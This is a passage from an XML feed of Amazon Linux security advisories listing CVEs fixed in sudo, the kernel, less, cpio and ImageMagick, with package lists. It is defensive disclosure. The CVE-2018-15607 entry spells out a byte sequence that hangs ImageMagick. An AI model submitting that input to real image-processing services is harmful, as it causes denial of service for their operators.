from="linux-security@amazon.com"><id>ALAS-2024-1922</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1922: important priority package update for sudo</title><issued date="2024-02-23 00:25:00" /><updated date="2024-06-07 05:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-31969:
In sudo-1.8.23-10.amzn2.3.6 (Amazon Linux 2) and sudo-1.8.23-10.58.amzn1 (Amazon Linux 1), a user with an entry in the sudoers file, enabling them to run commands as another unprivileged user, can leverage it to run commands as root. No prior versions are affected. This issue has been fixed in sudo-1.8.23-10.amzn2.3.7 (AL2) and sudo-1.8.23-10.59.amzn1 (AL1).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31969" title="" id="CVE-2024-31969" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.23" release="10.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.23-10.59.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.23-10.59.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.23-10.59.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.59.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.23-10.59.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.23" release="10.59.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.23-10.59.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.59.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.23-10.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1923</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1923: important priority package update for kernel</title><issued date="2024-02-28 23:54:00" /><updated date="2024-03-04 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-23849:
In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access.
CVE-2023-6270:
A flaw was found in the ATA over Ethernet (AoE) driver in the Linux kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on `struct net_device`, and a use-after-free can be triggered by racing between the free on the struct and the access through the `skbtxq` global queue. This could lead to a denial of service condition or potential code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6270" title="" id="CVE-2023-6270" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23849" title="" id="CVE-2024-23849" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.336-180.562.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1924</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1924: important priority package update for less</title><issued date="2024-02-28 23:54:00" /><updated date="2024-03-04 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48624:
close_altfile in filename.c in less before 606 omits shell_quote calls for LESSCLOSE.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48624" title="" id="CVE-2022-48624" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="less-debuginfo" version="436" release="13.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/less-debuginfo-436-13.13.amzn1.x86_64.rpm</filename></package><package name="less" version="436" release="13.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/less-436-13.13.amzn1.x86_64.rpm</filename></package><package name="less" version="436" release="13.13.amzn1" epoch="0" arch="i686"><filename>Packages/less-436-13.13.amzn1.i686.rpm</filename></package><package name="less-debuginfo" version="436" release="13.13.amzn1" epoch="0" arch="i686"><filename>Packages/less-debuginfo-436-13.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1925</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1925: important priority package update for cpio</title><issued date="2024-02-28 23:54:00" /><updated date="2024-03-04 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1197:
cpio 2.11, when using the --no-absolute-filenames option, allows local users to write to arbitrary files via a symlink attack on a file in an archive.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1197" title="" id="CVE-2015-1197" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cpio" version="2.10" release="12.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/cpio-2.10-12.13.amzn1.x86_64.rpm</filename></package><package name="cpio-debuginfo" version="2.10" release="12.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/cpio-debuginfo-2.10-12.13.amzn1.x86_64.rpm</filename></package><package name="cpio" version="2.10" release="12.13.amzn1" epoch="0" arch="i686"><filename>Packages/cpio-2.10-12.13.amzn1.i686.rpm</filename></package><package name="cpio-debuginfo" version="2.10" release="12.13.amzn1" epoch="0" arch="i686"><filename>Packages/cpio-debuginfo-2.10-12.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1926</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1926: important priority package update for ImageMagick</title><issued date="2024-03-13 19:46:00" /><updated date="2024-03-19 15:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code onto the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-13139:
In ImageMagick before 6.9.9-0 and 7.x before 7.0.6-1, the ReadOneMNGImage function in coders/png.c has an out-of-bounds read with the MNG CLIP chunk.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders\xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
CVE-2016-5841:
Integer overflow in MagickCore/profile.c in ImageMagick before 7.0.2-1 allows remote attackers to cause a denial of service (segmentation fault) or possibly execute arbitrary code via vectors involving the offset variable.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5841" title="" id="CVE-2016-5841" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13139" title="" id="CVE-2017-13139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" 